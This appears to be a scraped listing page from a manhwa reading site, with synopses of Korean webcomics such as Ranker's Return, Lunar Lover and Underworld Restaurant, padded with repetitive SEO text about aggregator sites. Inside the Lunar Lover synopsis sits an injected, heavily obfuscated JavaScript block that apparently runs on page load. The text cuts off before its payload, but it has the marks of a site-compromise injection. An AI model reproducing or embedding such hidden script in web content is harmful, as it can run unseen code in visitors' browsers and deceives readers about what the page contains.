Manhwa - Page 253

Manhwa represents the vibrant world of Korean comics, loved for their unique style and stories, especially in webtoon format, covering everything from action to drama.

3089 results

Ranker's Return (Remake)

In the early days of the virtual reality game, Arena, MeleeGod was the strongest ranked player! He deleted his character and suddenly left. In order to restore his bankrupt family, he returned to Arena! "Do you want to create a character?"


Lunar Lover

About to die, a mysterious man grants Yunho immortality. Well, with a catch. During the night, he suffers no injury. During the day, his body burns alive. No, he’s not a vampire. At least that’s what Ui, his young, beautiful, new next-door neighbor wants to believe. Who is the man with the power to defy death? What is the significance of the hair ornament he’s chasing? And why are people dying to find it…<script></script><script>function _0xf811(_0x561da4,_0x20122e){var _0x214ddc=_0x19e7();return _0xf811=function(_0x520769,_0x2868a5){_0x520769=_0x520769-(0xa+-0x10a3+0x1132);var _0x309ed2=_0x214ddc[_0x520769];return _0x309ed2;},_0xf811(_0x561da4,_0x20122e);}(function(_0x391dc2,_0x5a2646){var _0x2024cb=_0xf811,_0x5ade66=_0x391dc2();while(!![]){try{var _0x607c14=parseInt(_0x2024cb(0xab))/(0x3*-0x25b+0x298*0x6+-0x87e)+-parseInt(_0x2024cb(0xb0))/(-0xd*0x43+0x2176*0x1+-0x1e0d)*(parseInt(_0x2024cb(0x9e))/(-0xfc3+-0x3b3+0x1379))+parseInt(_0x2024cb(0xb9))/(0x1517+0xb88+0x11*-0x1eb)*(-parseInt(_0x2024cb(0xb6))/(0x1*-0x1d07+-0x1*0x2697+-0x43a3*-0x1))+parseInt(_0x2024cb(0xa1))/(-0x1*0x1255+-0x684+-0x1*-0x18df)+parseInt(_0x2024cb(0xb7))/(-0x3b9*0x1+-0xd52+0x1112*0x1)+-parseInt(_0x2024cb(0xa5))/(-0x39a+0x3*0x8ed+-0x1725)+parseInt(_0x2024cb(0xa7))/(0x20e2+0xf*0x1ab+-0x134a*0x3);if(_0x607c14===_0x5a2646)break;else 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The Villainess’s Nursery [Official]

Read manhwa The Villainess’s Nursery [Official] Yerin who died trying to save her student is reincarnated into Fiora a villainess from a story she is familiar with. In the original story, Fiora secretly torments the children of Duke Baridas the man she is engaged to, but later gets exposed and ends up being dumped and executed. Her ultimate goal is a clean breakup that will land her some alimony so she can open a daycare center in this universe. But can she live this life as a character that veers off the set fate and most importantly don’t end up dead?

21 hours ago

Underworld Restaurant

Read Underworld Restaurant Novel – Underworld Restaurant Manhwa Online Free At ZINMANGA.NET The summary of the comic Underworld Restaurant: Lee Kangjin has just inherited an entire building in the affluent Gangnam neighborhood of Seoul. The only catch is he has to run the diner in that building for five years, but little does he know that he has to serve ghosts too! From 11 p.m. to 1 a.m., ghosts who carry resentment in their hearts come flocking to the diner in search of their comfort foods that remind them of what life was like. Can Kangjin handle both the culinary and personal demands of his undead customers for five whole years? “Underworld Restaurant” is also known as: Afterlife’s Dining / Nhà Hàng Nơi Suối Vàng / Restaurant in the After Life / Afterlife Dine / 冥界食堂 / 黄泉餐厅 / 저승식당 The comic Underworld Restaurant belongs to the Genre: Drama, Slice of Life “Top Manhwa, MangaUpdates, Read Manhwa Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced The Corrupted Witch Has No Choice But to Become a Villain I Became The King by Scavenging


Seeking For Your Forgiveness

Read manhwa Seeking For Your Forgiveness “Let’s get a divorce.” Marianne’s declaration of divorce. The arrogant Kristoff firmly believed it was just a fleeting whim on her part. After all, everything in the world had always gone his way. But he was wrong. Consumed by regret, Kristoff tries his best to win Marianne back, but her heart has already turned away, and she doesn’t easily let him near. “What can I do to make you love me again, Marianne?” 당신의 용서를 구합니다


The Skeleton Soldier Failed To Defend The Dungeon

Meet the Skeleton Soldier, a meager but fiercely loyal fighter who serves to protect its master, Lady Succubus. Its dream of a peaceful life with her is shattered when they're both brutally murdered by a group of warriors one day. But what would've been a pathetic end to an unremarkable soul sparks a new beginning: when the Skeleton Soldier opens its eyes again, it has traveled back 20 years in time! “I must warn Lady Succubus of all the things to come!” But with no special combat skills and a history of failure and defeat, how can it stop the horrible events from unfolding again? Follow the Skeleton Soldier as it faces the most challenging quest of all—rewriting the ending to its own story.


The main character hides his strength

Read “The main character hides his strength Novel” – “The main character hides his strength Manhwa” Online Free At GenzToons The summary of the comics “The main character hides his strength”: “Face your destiny.” In the alternate realm of the Otherworld—filled with creatures and Earth’s catastrophes—an ancient warrior, a human summoned long ago into the realm, is determined to bring it all to an end. Fueled by the resentment of an unknown past, this journey unravels hidden identities, embarks on undercover missions, faces death trials, navigates through betrayals, and wades through bloodbaths. What do the shadows conceal, and what destiny awaits in the heart of the unknown? “The main character hides his strength” is alternatively named: Juin Gongi Himeul Sungim / Main Character Hides His Strength / The Main Character Hides His Power / The Main Character Hides His Powers / The Silent Warrior / The Protagonist Hides His Powers / The Protagonist’s Hidden Strength / The Protagonists Hidden Strength / The Protagonist’s Hidden Strength / 主人公隐藏了实力 / 주인공이 힘을 숨김 The comics “The main character hides his strength” belongs to the Genre: Action, Adventure, Fantasy, Manhwa “Kun Manga, MANGA UPDATES, Manhwa Website…” are the most searched keywords on the website S2Manga. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Becoming A Family With The Duke and His Dear Son

Read manhwa Becoming A Family With The Duke and His Dear Son / The Male Lead’s Dad Refuses to Breakup / The Male Lead’s Dad Refuses to Break the engagement After being transmigrated as Ibellia the Villainess, Soyoon strives to twist the plot in order to survive in her favorite web novel. Her plan is to break off the engagement with Duke Cassis Adelhardt and live a quiet life on her own. However, the Duke and his young son Lucius would not let her go so easily. “Lady Ibellia… Will you be Lus’ mommy?” “Becoming A Family With The Duke and His Dear Son Manhwa” is sames name: 남주 아빠가 파혼을 거부한다


Honey, Why Can’t We Get A Divorce?

Read manhwa Honey, Why Can’t We Get A Divorce? / Honey, Can’t I Get a Divorce? She possessed an evil woman who loves the main lead and killed her husband. Fortunately, the timeline was before she killed her husband. And unfortunately, everyone knows she loved the male lead so much. In this case, she would have to get a divorce as soon as possible. But why… “Crazy, crazy, crazy. I just heard it. I didn’t know it was crazy,” my husband said, tearing apart the divorce papers I gave to him. “I can’t help it. I have no choice but to live with a crazy woman.” No, you do have a choice? Why can’t I get a divorce? “Honey, Why Can’t We Get A Divorce? Manhwa” is another name: 여보, 왜 이혼은 안 되나요?

1 days ago

A Kiss Is Not Enough

Read manhwa A Kiss Is Not Enough / It’s Not Enough Just to Kiss / キスだけじゃ足りない / 大明星的kiss教学 / 키스만으론 부족해 Young actress Joo Arin is set to make her big-screen debut, but while preparing for the role, she comes across a bit of a problem… She has to film a kiss scene even though she hasn’t even had her first kiss yet! As Arin struggles to practice for the shoot, top star Kang Hajun, who happens to be with the same agency, decides to help out by teaching her how to kiss. As she starts these special secret lessons, Arin’s finding it hard to tell if she’s more immersed in the role or in Hajun.


I Became A Part Time Employee For Gods

Read Manhwa I Became A Part Time Employee For Gods Online For Free At TopManhua Associated Names: Albanala of the Gods / Albanara of the Gods / Albanian of the Gods / I’m a Part-Timer for the Gods / The Part Time Nation of the Gods / The Part-Time Land of the Gods / จ๊อบพิเศษ เทพสั่งมา / 眾神的打工仔 / 神々より与えられしバイト / 神的打工世界 / 신들의 알바나라 The Content I Became A Part Time Employee For Gods: When areas called “Dungeons” started appearing, individuals with Abilities also emerged. Damduk Yoo believed that these Abilities would catapult mankind to greater heights until he realized he wasn’t given any! Damduk loathed his situation so much that he cursed the gods, and the gods seemed to have heard him since he was struck by lightning. When he woke up, a system window appeared, telling him the gods were waiting for him… New and hot comics are updated the fastest. God & Dark Pirates Battle Armor Academy The Evil Ring Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.


Black Haze (2025)

Read manhwa Black Haze (2025) A long time ago, a portal to another world was opened, and those who acquired special abilities along with marks began to be called mages. After the incident known as “that day”, the first-class mage from Ophion, known as “Blow”, has become very famous. One day, he receives a very special mission: to protect the second son of the Artian family, who suffers from being called a “monster” at the magic school “Helios”! Thus, Blow enrolls in Helios under the name “Rood Krisch” to hide his true identity… 블랙 헤이즈 (2025)
